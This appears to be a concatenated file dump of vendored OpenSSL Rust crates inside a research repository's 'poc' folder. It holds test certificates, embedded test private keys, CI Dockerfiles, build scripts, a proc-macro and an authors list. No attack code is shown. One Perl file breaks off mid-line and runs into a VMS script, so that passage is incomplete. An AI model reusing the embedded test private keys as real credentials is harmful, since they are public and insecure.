-------------------------------------------------------------------------------- https://raw.githubusercontent.com/FPSG-UIUC/GoFetch/13e2533b930f1ece5f0cee4969c0f0f184f65854/poc/openssl-0.10.42/test/cms.p12 -------------------------------------------------------------------------------- /poc/openssl-0.10.42/test/cms_pubkey.der: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/FPSG-UIUC/GoFetch/13e2533b930f1ece5f0cee4969c0f0f184f65854/poc/openssl-0.10.42/test/cms_pubkey.der -------------------------------------------------------------------------------- /poc/openssl-0.10.42/test/dhparams.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN DH PARAMETERS----- 2 | MIIBCAKCAQEAh3Betv+hf5jNsOmGXU8oxuABD2B8r0yU8FVgjnCZBSVo61qJ0A2d 3 | J6r8rYKbjtolnrZN/V4IPSzYvxurHbu8nbiFVyhOySPchI2Fu+YT/HsSe/0MH9bW 4 | gJTNzmutWoy9VxtWLCmXnOSZHep3MZ1ZNimno6Kh2qQ7VJr0+KF8GbxUKOPv4SqK 5 | NBwouIQXFc0pE9kGhcGKbr7TnHhyJFCRLNP1OVDQZbcoKjk1Vh+5sy7vM2VUTQmM 6 | yOToT2LEZVAUJXNumcYMki9MIwfYCwYZbNt0ZEolyHzUEesuyHfU1eJd6+sKEjUz 7 | 5GteQIR7AehxZIS+cytu7BXO7B0owLJ2awIBAg== 8 | -----END DH PARAMETERS----- 9 | -------------------------------------------------------------------------------- /poc/openssl-0.10.42/test/dsa.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN DSA PRIVATE KEY----- 2 | MIIBuwIBAAKBgQCkKe/jtYKJNQafaE7kg2aaJOEPUV0Doi451jkXHp5UfLh6+t42 3 | eabSGkE9WBAlILgaB8yHckLe9+zozN39+SUDp94kb2r38/8w/9Ffhbsep9uiyOj2 4 | ZRQur6SkpKQDKcnAd6IMZXZcvdSgPC90A6qraYUZKq7Csjn63gbC+IvXHwIVAIgS 5 | PE43lXD8/rGYxos4cxCgGGAxAoGASMV56WhLvVQtWMVI36WSIxbZnC2EsnNIKeVW 6 | yXnP/OmPJ2mdezG7i1alcwsO2TnSLbvjvGPlyzIqZzHvWC8EmDqsfbU+n8we/Eal 7 | sm5nloC8m9ECWpbTzbNdvrAAj9UPVWjcDwg7grAGGysh6lGbBv5P+4zL/niq1UiE 8 | LnKcifgCgYEAo6mAasO0+MVcu8shxxUXXNeTLsZ8NB/BIx9EZ/dzE23ivNW8dq1A 9 | eecAAYhssI2m/CspQvyKw+seCvg4FccxJgB3+mGOe+blFHwO3eAwoyRn/t3DZDHh 10 | FjxKKRsQdy4BkZv+vhTyIYYCw0iPZ5Wfln+pyGGTveIDED1MPG+J6c8CFCJAUlEl 11 | 4nHvbC15xLXXpd46zycY 12 | -----END DSA PRIVATE KEY----- 13 | -------------------------------------------------------------------------------- /poc/openssl-0.10.42/test/dsa.pem.pub: -------------------------------------------------------------------------------- 1 | -----BEGIN PUBLIC KEY----- 2 | MIIBtzCCASsGByqGSM44BAEwggEeAoGBAKQp7+O1gok1Bp9oTuSDZpok4Q9RXQOi 3 | LjnWORcenlR8uHr63jZ5ptIaQT1YECUguBoHzIdyQt737OjM3f35JQOn3iRvavfz 4 | /zD/0V+Fux6n26LI6PZlFC6vpKSkpAMpycB3ogxldly91KA8L3QDqqtphRkqrsKy 5 | OfreBsL4i9cfAhUAiBI8TjeVcPz+sZjGizhzEKAYYDECgYBIxXnpaEu9VC1YxUjf 6 | pZIjFtmcLYSyc0gp5VbJec/86Y8naZ17MbuLVqVzCw7ZOdItu+O8Y+XLMipnMe9Y 7 | LwSYOqx9tT6fzB78RqWybmeWgLyb0QJaltPNs12+sACP1Q9VaNwPCDuCsAYbKyHq 8 | UZsG/k/7jMv+eKrVSIQucpyJ+AOBhQACgYEAo6mAasO0+MVcu8shxxUXXNeTLsZ8 9 | NB/BIx9EZ/dzE23ivNW8dq1AeecAAYhssI2m/CspQvyKw+seCvg4FccxJgB3+mGO 10 | e+blFHwO3eAwoyRn/t3DZDHhFjxKKRsQdy4BkZv+vhTyIYYCw0iPZ5Wfln+pyGGT 11 | veIDED1MPG+J6c8= 12 | -----END PUBLIC KEY----- 13 | -------------------------------------------------------------------------------- /poc/openssl-0.10.42/test/dsaparam.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN DSA PARAMETERS----- 2 | MIIBHgKBgQCkKe/jtYKJNQafaE7kg2aaJOEPUV0Doi451jkXHp5UfLh6+t42eabS 3 | GkE9WBAlILgaB8yHckLe9+zozN39+SUDp94kb2r38/8w/9Ffhbsep9uiyOj2ZRQu 4 | r6SkpKQDKcnAd6IMZXZcvdSgPC90A6qraYUZKq7Csjn63gbC+IvXHwIVAIgSPE43 5 | lXD8/rGYxos4cxCgGGAxAoGASMV56WhLvVQtWMVI36WSIxbZnC2EsnNIKeVWyXnP 6 | /OmPJ2mdezG7i1alcwsO2TnSLbvjvGPlyzIqZzHvWC8EmDqsfbU+n8we/Ealsm5n 7 | loC8m9ECWpbTzbNdvrAAj9UPVWjcDwg7grAGGysh6lGbBv5P+4zL/niq1UiELnKc 8 | ifg= 9 | -----END DSA PARAMETERS----- 10 | -------------------------------------------------------------------------------- /poc/openssl-0.10.42/test/identity.p12: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/FPSG-UIUC/GoFetch/13e2533b930f1ece5f0cee4969c0f0f184f65854/poc/openssl-0.10.42/test/identity.p12 -------------------------------------------------------------------------------- /poc/openssl-0.10.42/test/key.der: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/FPSG-UIUC/GoFetch/13e2533b930f1ece5f0cee4969c0f0f184f65854/poc/openssl-0.10.42/test/key.der -------------------------------------------------------------------------------- /poc/openssl-0.10.42/test/key.der.pub: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/FPSG-UIUC/GoFetch/13e2533b930f1ece5f0cee4969c0f0f184f65854/poc/openssl-0.10.42/test/key.der.pub -------------------------------------------------------------------------------- /poc/openssl-0.10.42/test/key.pem.pub: -------------------------------------------------------------------------------- 1 | -----BEGIN PUBLIC KEY----- 2 | MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAr1bXMptaIgOL9PVL8a7W 3 | KG/C8+IbxP018eMBQZT0SnPQmXp0Q8Aai/F+AEDE7b5sO5U7WdxU4GRYw0wqkQNF 4 | si78KNfoj2ZMlx6NRfl4UKuzrpGTPgQxuKDYedngPpWcbmW4P3zEL2Y7b18n9NJr 5 | atRUzH1Zh/ReRO525Xadu58aviPw1Mzgse7cKyzb03Gll9noLnYNIIpO8jL+QyrD 6 | 8qNmfacmR20U0a6XDTtmsmk7AitGETICbTT0KRf+oAP0yIHoonllPpNLUEPZQjrp 7 | ClS/S/wKdj7gaq9TaMbHULhFMjbCV8cuPu//rUAuWp3riaznZGOVQyn3Dp2CB3ad 8 | yQIDAQAB 9 | -----END PUBLIC KEY----- 10 | -------------------------------------------------------------------------------- /poc/openssl-0.10.42/test/keystore-empty-chain.p12: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/FPSG-UIUC/GoFetch/13e2533b930f1ece5f0cee4969c0f0f184f65854/poc/openssl-0.10.42/test/keystore-empty-chain.p12 -------------------------------------------------------------------------------- /poc/openssl-0.10.42/test/nid_test_cert.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE----- 2 | MIIB1DCCAX6gAwIBAgIJAMzXWZGWHleWMA0GCSqGSIb3DQEBCwUAMFYxHzAdBgkq 3 | hkiG9w0BCQEWEHRlc3RAZXhhbXBsZS5jb20xFDASBgNVBAMMC2V4YW1wbGUuY29t 4 | MR0wGwYJKoZIhvcNAQkUHg4ARQB4AGEAbQBwAGwAZTAeFw0xNTA3MDEwNjQ3NDRa 5 | Fw0xNTA3MzEwNjQ3NDRaMFYxHzAdBgkqhkiG9w0BCQEWEHRlc3RAZXhhbXBsZS5j 6 | b20xFDASBgNVBAMMC2V4YW1wbGUuY29tMR0wGwYJKoZIhvcNAQkUHg4ARQB4AGEA 7 | bQBwAGwAZTBcMA0GCSqGSIb3DQEBAQUAA0sAMEgCQQCmejzp4+o35FD0hAnx2trL 8 | 08h07X5jZca9DgZH35hWXPh7fMucLt/IPXIRnz2zKEa/Mo6D2V/fx03Mqo0epid7 9 | AgMBAAGjLzAtMB0GA1UdDgQWBBRQa57tXz3rZNRz+fTbo3w3jQJMBTAMBgNVHRME 10 | BTADAQH/MA0GCSqGSIb3DQEBCwUAA0EAm0iY9cr+gvC+vcQIebdofpQ4GcDW8U6W 11 | Bxs8ZXinLl69P0jYLum3+XITNFRiyQqcivaxdxthxDNOX7P+aKwkJA== 12 | -----END CERTIFICATE----- 13 | -------------------------------------------------------------------------------- /poc/openssl-0.10.42/test/pkcs1.pem.pub: -------------------------------------------------------------------------------- 1 | -----BEGIN RSA PUBLIC KEY----- 2 | MIIBCgKCAQEAyrcf7lv42BCoiDd3LYmF8eaGO4rhmGzGgi+NSZowkEuLhibHGQle 3 | FkZC7h1VKsxKFgy7Fx+GYHkv9OLm9H5fdp3HhYlo19bZVGvSJ66OJe/Bc4S02bBb 4 | Y8vwpc/N5O77m5J/nHLuL7XJtpfSKkX+3NPiX1X2L99iipt7F0a7hNws3G3Lxg6t 5 | P3Yc55TPjXzXvDIgjt/fag6iF8L/bR3augJJdDhLzNucR8A5HcvPtIVo51R631Zq 6 | MCh+dZvgz9zGCXwsvSky/iOJTHN3wnpsWuCAzS1iJMfjR783Tfv6sWFs19FH7pHP 7 | xBA3b2enPM9KBzINGOly0eM4h0fh+VBltQIDAQAB 8 | -----END RSA PUBLIC KEY----- 9 | -------------------------------------------------------------------------------- /poc/openssl-0.10.42/test/pkcs8-nocrypt.der: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/FPSG-UIUC/GoFetch/13e2533b930f1ece5f0cee4969c0f0f184f65854/poc/openssl-0.10.42/test/pkcs8-nocrypt.der -------------------------------------------------------------------------------- /poc/openssl-0.10.42/test/pkcs8.der: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/FPSG-UIUC/GoFetch/13e2533b930f1ece5f0cee4969c0f0f184f65854/poc/openssl-0.10.42/test/pkcs8.der -------------------------------------------------------------------------------- /poc/openssl-0.10.42/test/rsa.pem.pub: -------------------------------------------------------------------------------- 1 | -----BEGIN PUBLIC KEY----- 2 | MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAofgWCuLjybRlzo0tZWJj 3 | NiuSfb4p4fAkd/wWJcyQoTbji9k0l8W26mPddxHmfHQp+Vaw+4qPCJrcS2mJPMEz 4 | P1Pt0Bm4d4QlL+yRT+SFd2lZS+pCgNMsD1W/YpRPEwOWvG6b32690r2jZ47soMZo 5 | 9wGzjb/7OMg0LOL+bSf63kpaSHSXndS5z5rexMdbBYUsLA9e+KXBdQOS+UTo7WTB 6 | EMa2R2CapHg665xsmtdVMTBQY4uDZlxvb3qCo5ZwKh9kG4LT6/I5IhlJH7aGhyxX 7 | FvUK+DWNmoudF8NAco9/h9iaGNj8q2ethFkMLs91kzk2PAcDTW9gb54h4FRWyuXp 8 | oQIDAQAB 9 | -----END PUBLIC KEY----- 10 | -------------------------------------------------------------------------------- /poc/openssl-macros-0.1.0/.cargo-ok: -------------------------------------------------------------------------------- 1 | ok -------------------------------------------------------------------------------- /poc/openssl-macros-0.1.0/.cargo_vcs_info.json: -------------------------------------------------------------------------------- 1 | { 2 | "git": { 3 | "sha1": "f56e2e8b6c69ec08f3f02e8b733a60dd412e893f" 4 | }, 5 | "path_in_vcs": "openssl-macros" 6 | } -------------------------------------------------------------------------------- /poc/openssl-macros-0.1.0/Cargo.toml: -------------------------------------------------------------------------------- 1 | # THIS FILE IS AUTOMATICALLY GENERATED BY CARGO 2 | # 3 | # When uploading crates to the registry Cargo will automatically 4 | # "normalize" Cargo.toml files for maximal compatibility 5 | # with all versions of Cargo and also rewrite `path` dependencies 6 | # to registry (e.g., crates.io) dependencies. 7 | # 8 | # If you are reading this file be aware that the original Cargo.toml 9 | # will likely look very different (and much more reasonable). 10 | # See Cargo.toml.orig for the original contents. 11 | 12 | [package] 13 | edition = "2018" 14 | name = "openssl-macros" 15 | version = "0.1.0" 16 | description = "Internal macros used by the openssl crate." 17 | license = "MIT/Apache-2.0" 18 | 19 | [lib] 20 | proc-macro = true 21 | 22 | [dependencies.proc-macro2] 23 | version = "1" 24 | 25 | [dependencies.quote] 26 | version = "1" 27 | 28 | [dependencies.syn] 29 | version = "1" 30 | features = ["full"] 31 | -------------------------------------------------------------------------------- /poc/openssl-macros-0.1.0/Cargo.toml.orig: -------------------------------------------------------------------------------- 1 | [package] 2 | name = "openssl-macros" 3 | version = "0.1.0" 4 | edition = "2018" 5 | license = "MIT/Apache-2.0" 6 | description = "Internal macros used by the openssl crate." 7 | 8 | [lib] 9 | proc-macro = true 10 | 11 | [dependencies] 12 | proc-macro2 = "1" 13 | quote = "1" 14 | syn = { version = "1", features = ["full"] } 15 | -------------------------------------------------------------------------------- /poc/openssl-macros-0.1.0/src/lib.rs: -------------------------------------------------------------------------------- 1 | use proc_macro::TokenStream; 2 | use proc_macro2::Ident; 3 | use quote::quote; 4 | use syn::{parse_macro_input, ItemFn}; 5 | 6 | #[proc_macro_attribute] 7 | pub fn corresponds(attr: TokenStream, item: TokenStream) -> TokenStream { 8 | let function = parse_macro_input!(attr as Ident); 9 | let item = parse_macro_input!(item as ItemFn); 10 | 11 | let function = function.to_string(); 12 | let line = format!( 13 | "This corresponds to [`{0}`](https://www.openssl.org/docs/manmaster/man3/{0}.html).", 14 | function 15 | ); 16 | 17 | let attrs = item.attrs; 18 | let vis = item.vis; 19 | let sig = item.sig; 20 | let block = item.block; 21 | 22 | let out = quote! { 23 | #(#attrs)* 24 | #[doc = ""] 25 | #[doc = #line] 26 | #[doc(alias = #function)] 27 | #vis #sig #block 28 | }; 29 | out.into() 30 | } 31 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/.cargo-ok: -------------------------------------------------------------------------------- 1 | ok -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/.cargo_vcs_info.json: -------------------------------------------------------------------------------- 1 | { 2 | "git": { 3 | "sha1": "021754a8b9f60df5a1be3436a1bb4f7f5a3360d0" 4 | }, 5 | "path_in_vcs": "" 6 | } -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/.github/dependabot.yml: -------------------------------------------------------------------------------- 1 | version: 2 2 | updates: 3 | - package-ecosystem: cargo 4 | directory: "/" 5 | schedule: 6 | interval: daily 7 | time: "08:00" 8 | open-pull-requests-limit: 10 9 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/.gitignore: -------------------------------------------------------------------------------- 1 | target/ 2 | **/*.rs.bk 3 | Cargo.lock 4 | build_dir/ 5 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/.gitmodules: -------------------------------------------------------------------------------- 1 | [submodule "openssl"] 2 | path = openssl 3 | url = https://github.com/openssl/openssl 4 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/ci/docker/aarch64-linux-android/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:18.04 2 | 3 | RUN apt-get update -y && apt-get install -y --no-install-recommends \ 4 | ca-certificates \ 5 | curl \ 6 | make \ 7 | perl \ 8 | python \ 9 | unzip \ 10 | gcc \ 11 | libc6-dev 12 | 13 | RUN curl -O https://dl.google.com/android/repository/android-ndk-r15b-linux-x86_64.zip 14 | RUN unzip -q android-ndk-r15b-linux-x86_64.zip 15 | RUN android-ndk-r15b/build/tools/make_standalone_toolchain.py \ 16 | --unified-headers \ 17 | --install-dir /android/ndk \ 18 | --arch arm64 \ 19 | --api 24 20 | 21 | ENV PATH=$PATH:/android/ndk/bin \ 22 | CARGO_TARGET_AARCH64_LINUX_ANDROID_LINKER=aarch64-linux-android-gcc \ 23 | CARGO_TARGET_AARCH64_LINUX_ANDROID_RUNNER=echo 24 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/ci/docker/aarch64-unknown-linux-gnu/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:18.04 2 | 3 | RUN apt-get update -y && apt-get install -y --no-install-recommends \ 4 | ca-certificates \ 5 | make \ 6 | perl \ 7 | gcc \ 8 | libc6-dev \ 9 | gcc-aarch64-linux-gnu \ 10 | libc6-dev-arm64-cross 11 | ENV CARGO_TARGET_AARCH64_UNKNOWN_LINUX_GNU_RUNNER=echo \ 12 | CARGO_TARGET_AARCH64_UNKNOWN_LINUX_GNU_LINKER=aarch64-linux-gnu-gcc 13 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/ci/docker/arm-linux-androideabi/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:18.04 2 | 3 | RUN apt-get update -y && apt-get install -y --no-install-recommends \ 4 | ca-certificates \ 5 | curl \ 6 | make \ 7 | perl \ 8 | python \ 9 | unzip \ 10 | gcc \ 11 | libc6-dev 12 | 13 | RUN curl -O https://dl.google.com/android/repository/android-ndk-r15b-linux-x86_64.zip 14 | RUN unzip -q android-ndk-r15b-linux-x86_64.zip 15 | RUN android-ndk-r15b/build/tools/make_standalone_toolchain.py \ 16 | --unified-headers \ 17 | --install-dir /android/ndk \ 18 | --arch arm \ 19 | --api 24 20 | 21 | ENV PATH=$PATH:/android/ndk/bin \ 22 | CARGO_TARGET_ARM_LINUX_ANDROIDEABI_LINKER=arm-linux-androideabi-gcc \ 23 | CARGO_TARGET_ARM_LINUX_ANDROIDEABI_RUNNER=echo 24 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/ci/docker/arm-unknown-linux-gnueabi/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:18.04 2 | 3 | RUN apt-get update -y && apt-get install -y --no-install-recommends \ 4 | ca-certificates \ 5 | make \ 6 | perl \ 7 | gcc \ 8 | libc6-dev \ 9 | gcc-arm-linux-gnueabi \ 10 | libc6-dev-armel-cross 11 | 12 | ENV CARGO_TARGET_ARM_UNKNOWN_LINUX_GNUEABI_RUNNER=echo \ 13 | CARGO_TARGET_ARM_UNKNOWN_LINUX_GNUEABI_LINKER=arm-linux-gnueabi-gcc 14 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/ci/docker/asmjs-unknown-emscripten/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM trzeci/emscripten 2 | ENV CARGO_TARGET_ASMJS_UNKNOWN_EMSCRIPTEN_RUNNER=node \ 3 | CARGO_TARGET_ARM_UNKNOWN_LINUX_GNUEABI_LINKER=arm-linux-gnueabi-gcc 4 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/ci/docker/i686-linux-android/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:18.04 2 | 3 | RUN apt-get update -y && apt-get install -y --no-install-recommends \ 4 | ca-certificates \ 5 | curl \ 6 | make \ 7 | perl \ 8 | python \ 9 | unzip \ 10 | gcc \ 11 | libc6-dev 12 | 13 | RUN curl -O https://dl.google.com/android/repository/android-ndk-r15b-linux-x86_64.zip 14 | RUN unzip -q android-ndk-r15b-linux-x86_64.zip 15 | RUN android-ndk-r15b/build/tools/make_standalone_toolchain.py \ 16 | --unified-headers \ 17 | --install-dir /android/ndk \ 18 | --arch x86 \ 19 | --api 24 20 | 21 | ENV PATH=$PATH:/android/ndk/bin \ 22 | CARGO_TARGET_I686_LINUX_ANDROID_LINKER=i686-linux-android-gcc \ 23 | CARGO_TARGET_I686_LINUX_ANDROID_RUNNER=echo 24 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/ci/docker/i686-unknown-linux-gnu/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:18.04 2 | 3 | RUN apt-get update -y && apt-get install -y --no-install-recommends \ 4 | ca-certificates \ 5 | make \ 6 | perl \ 7 | gcc-multilib \ 8 | libc6-dev 9 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/ci/docker/x86_64-linux-android/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:18.04 2 | 3 | RUN apt-get update -y && apt-get install -y --no-install-recommends \ 4 | ca-certificates \ 5 | curl \ 6 | make \ 7 | perl \ 8 | python \ 9 | unzip \ 10 | gcc \ 11 | libc6-dev 12 | 13 | RUN curl -O https://dl.google.com/android/repository/android-ndk-r15b-linux-x86_64.zip 14 | RUN unzip -q android-ndk-r15b-linux-x86_64.zip 15 | RUN android-ndk-r15b/build/tools/make_standalone_toolchain.py \ 16 | --unified-headers \ 17 | --install-dir /android/ndk \ 18 | --arch x86_64 \ 19 | --api 24 20 | 21 | ENV PATH=$PATH:/android/ndk/bin \ 22 | CARGO_TARGET_X86_64_LINUX_ANDROID_LINKER=x86_64-linux-android-gcc \ 23 | CARGO_TARGET_X86_64_LINUX_ANDROID_RUNNER=echo 24 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/ci/docker/x86_64-pc-windows-gnu/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:18.04 2 | 3 | RUN apt-get update -y && apt-get install -y --no-install-recommends \ 4 | ca-certificates \ 5 | make \ 6 | perl \ 7 | gcc \ 8 | libc6-dev \ 9 | gcc-mingw-w64-x86-64 10 | 11 | ENV CARGO_TARGET_X86_64_PC_WINDOWS_GNU_LINKER=x86_64-w64-mingw32-gcc \ 12 | CARGO_TARGET_X86_64_PC_WINDOWS_GNU_RUNNER=echo 13 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/ci/docker/x86_64-unknown-linux-gnu/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:18.04 2 | 3 | RUN apt-get update -y && apt-get install -y --no-install-recommends \ 4 | ca-certificates \ 5 | make \ 6 | perl \ 7 | gcc \ 8 | libc6-dev 9 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/ci/docker/x86_64-unknown-linux-musl/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:18.04 2 | 3 | RUN apt-get update -y && apt-get install -y --no-install-recommends \ 4 | ca-certificates \ 5 | make \ 6 | perl \ 7 | gcc \ 8 | libc6-dev \ 9 | musl-tools 10 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/ci/run-docker.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | target=$1 4 | 5 | if [ ! -d ci/docker/$1 ]; then 6 | exec ci/run.sh $1 7 | fi 8 | 9 | set -ex 10 | 11 | docker build \ 12 | --rm \ 13 | --tag openssl-src-ci \ 14 | ci/docker/$1 15 | 16 | docker run \ 17 | --rm \ 18 | --volume `rustc --print sysroot`:/rust:ro \ 19 | --volume `pwd`:/usr/code:ro \ 20 | --volume `pwd`/target:/usr/code/target \ 21 | --volume $HOME/.cargo:/cargo \ 22 | --env CARGO_HOME=/cargo \ 23 | --workdir /usr/code \ 24 | openssl-src-ci \ 25 | bash -c "PATH=\$PATH:/rust/bin ci/run.sh $target" 26 | 27 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/ACKNOWLEDGEMENTS: -------------------------------------------------------------------------------- 1 | Please https://www.openssl.org/community/thanks.html for the current 2 | acknowledgements. 3 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/AUTHORS: -------------------------------------------------------------------------------- 1 | # This is the list of OpenSSL authors for copyright purposes. 2 | # 3 | # This does not necessarily list everyone who has contributed code, since in 4 | # some cases, their employer may be the copyright holder. To see the full list 5 | # of contributors, see the revision history in source control. 6 | OpenSSL Software Services, Inc. 7 | OpenSSL Software Foundation, Inc. 8 | 9 | # Individuals 10 | Andy Polyakov 11 | Ben Laurie 12 | Ben Kaduk 13 | Bernd Edlinger 14 | Bodo Möller 15 | David Benjamin 16 | David von Oheimb 17 | Dmitry Belyavskiy (Дмитрий Белявский) 18 | Emilia Käsper 19 | Eric Young 20 | Geoff Thorpe 21 | Holger Reif 22 | Kurt Roeckx 23 | Lutz Jänicke 24 | Mark J. Cox 25 | Matt Caswell 26 | Matthias St. Pierre 27 | Nicola Tuveri 28 | Nils Larsch 29 | Patrick Steuer 30 | Paul Dale 31 | Paul C. Sutton 32 | Paul Yang 33 | Ralf S. Engelschall 34 | Rich Salz 35 | Richard Levitte 36 | Shane Lontis 37 | Stephen Henson 38 | Steve Marquess 39 | Tim Hudson 40 | Tomáš Mráz 41 | Ulf Möller 42 | Viktor Dukhovni 43 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/Configurations/50-djgpp.conf: -------------------------------------------------------------------------------- 1 | # We can't make any commitment to support the DJGPP platform, 2 | # and rely entirely on the OpenSSL community to help is fine 3 | # tune and test. 4 | 5 | my %targets = ( 6 | "DJGPP" => { 7 | inherit_from => [ asm("x86_asm") ], 8 | CC => "gcc", 9 | CFLAGS => "-fomit-frame-pointer -O2 -Wall", 10 | cflags => "-I/dev/env/WATT_ROOT/inc -DTERMIOS -DL_ENDIAN", 11 | sys_id => "MSDOS", 12 | lflags => add("-L/dev/env/WATT_ROOT/lib"), 13 | ex_libs => add("-lwatt"), 14 | bn_ops => "BN_LLONG", 15 | perlasm_scheme => "a.out", 16 | }, 17 | ); 18 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/Configurations/unix-checker.pm: -------------------------------------------------------------------------------- 1 | #! /usr/bin/perl 2 | 3 | use Config; 4 | 5 | # Check that the perl implementation file modules generate paths that 6 | # we expect for the platform 7 | use File::Spec::Functions qw(:DEFAULT rel2abs); 8 | 9 | if (rel2abs('.') !~ m|/|) { 10 | die < no C_REHASH" 14 | $ ENDIF 15 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/VMS/test-includes.com: -------------------------------------------------------------------------------- 1 | $! Quick script to check how well including individual header files works 2 | $! on VMS, even when the VMS macro isn't defined. 3 | $ 4 | $ sav_def = f$env("DEFAULT") 5 | $ here = f$parse("A.;0",f$ENV("PROCEDURE")) - "A.;0" 6 | $ set default 'here' 7 | $ set default [-.include.openssl] 8 | $ define openssl 'f$env("DEFAULT")' 9 | $ set default [--] 10 | $ 11 | $ loop: 12 | $ f = f$search("openssl:*.h") 13 | $ if f .eqs. "" then goto loop_end 14 | $ write sys$output "Checking ",f 15 | $ open/write foo foo.c 16 | $ write foo "#undef VMS" 17 | $ write foo "#include " 18 | $ write foo "#include " 19 | $ write foo "main()" 20 | $ write foo "{printf(""foo\n"");}" 21 | $ close foo 22 | $ cc/STANDARD=ANSI89/NOLIST/PREFIX=ALL foo.c 23 | $ delete foo.c; 24 | $ goto loop 25 | $ loop_end: 26 | $ set default 'save_def' 27 | $ exit 28 | 29 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/apps/ca-cert.srl: -------------------------------------------------------------------------------- 1 | 07 2 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/apps/ca-key.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN PRIVATE KEY----- 2 | MIICdgIBADANBgkqhkiG9w0BAQEFAASCAmAwggJcAgEAAoGBAL4tQNyKy4U2zX6l 3 | IZvORB1edmwMwIgSB4cgoFECrG5pixzYxKauZkAwKG9/+L4DB8qXRjfXWcvafcOU 4 | DlYpRROykJ7wGkiqmqbZyrxY8DWjk5ZZQXiSuhYOAJB+Fyfb11JZV6+CvBQX/1g+ 5 | vhJr39Gmp6oAesoYrj90ecozClmnAgMBAAECgYA3j6sSg+5f9hnldUMzbPjTh8Sb 6 | XsJlPrc6UFrmMBzGiUleXSpe9Dbla+x0XvQCN4pwMvAN4nnWp/f0Su5BV/9Y93nb 7 | im5ijGNrfN9i6QrnqGCr+MMute+4E8HR2pCScX0mBLDDf40SmDvMzCaxtd21keyr 8 | 9DqHgInQZNEi6NKlkQJBAPCbUTFg6iQ6VTCQ8CsEf5q2xHhuTK23fJ999lvWVxN7 9 | QsvWb9RP9Ng34HVtvB7Pl6P7FyHLQYiDJhhvYR0L0+kCQQDKV/09Kt6Wjf5Omp1I 10 | wd3A+tFnipdqnPw+qNHGjevv0hYiEIWQOYbx00zXgaX+WN/pzV9eeNN2XAxlNJ++ 11 | dxcPAkBrzeuPKFFAcjKBVC+H1rgl5gYZv7Hzk+buv02G0H6rZ+sB0c7BXiHiTwbv 12 | Fn/XfkP/YR14Ms3mEH0dLaphjU8hAkEAh3Ar/rRiN04mCcEuRFQXtaNtZSv8PA2G 13 | Pf7MI2Y9pdHupLCAZlBLRjTUO2/5hu1AO4QPMPIZQSFN3rRBtMCL+wJAMp/m2hvI 14 | TmtbMp/IrKGfma09e3yFiCmoNn7cHLJ7jLvXcacV2XNzpr9YHfBxiZo0g9FqZKvv 15 | PZoQ5B2XJ7bhTQ== 16 | -----END PRIVATE KEY----- 17 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/apps/ca-req.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE REQUEST----- 2 | MIIBmzCCAQQCAQAwWzELMAkGA1UEBhMCQVUxEzARBgNVBAgMClF1ZWVuc2xhbmQx 3 | GjAYBgNVBAoMEUNyeXB0U29mdCBQdHkgTHRkMRswGQYDVQQDDBJUZXN0IENBICgx 4 | MDI0IGJpdCkwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAL4tQNyKy4U2zX6l 5 | 